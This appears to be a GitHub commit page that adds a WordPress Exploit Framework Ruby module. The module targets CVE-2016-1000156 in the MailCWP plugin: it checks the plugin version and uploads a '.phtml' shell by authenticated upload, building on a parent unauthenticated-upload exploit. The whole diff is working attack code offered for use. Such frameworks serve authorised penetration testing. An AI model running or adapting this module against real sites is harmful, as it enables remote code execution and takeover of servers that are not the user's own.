Skip to content
This repository was archived by the owner on Oct 22, 2020. It is now read-only.

Commit 02dc54e

Browse files
committed
Add MailCWP v1.100 authenticated shell upload
1 parent 513a1f5 commit 02dc54e

File tree

1 file changed

+33
-0
lines changed

1 file changed

+33
-0
lines changed
Lines changed: 33 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,33 @@
1+
require_relative './mailcwp_unauthenticated_shell_upload'
2+
3+
class Wpxf::Exploit::MailcwpAuthenticatedShellUpload < Wpxf::Exploit::MailcwpUnauthenticatedShellUpload
4+
def initialize
5+
super
6+
7+
update_info(
8+
name: 'MailCWP v1.100 Authenticated Shell Upload',
9+
author: [
10+
'Larry W. Cashdollar', # Discovery and disclosure
11+
'Rob Carr <rob[at]rastating.com>' # WPXF module
12+
],
13+
references: [
14+
['WPVDB', '8090'],
15+
['CVE', '2016-1000156'],
16+
['URL', 'http://www.vapidlabs.com/advisory.php?v=175']
17+
],
18+
date: 'Nov 01 2016'
19+
)
20+
end
21+
22+
def check
23+
check_plugin_version_from_readme('mailcwp', '1.101')
24+
end
25+
26+
def requires_authentication
27+
true
28+
end
29+
30+
def payload_name_extension
31+
'phtml'
32+
end
33+
end

0 commit comments

Comments
 (0)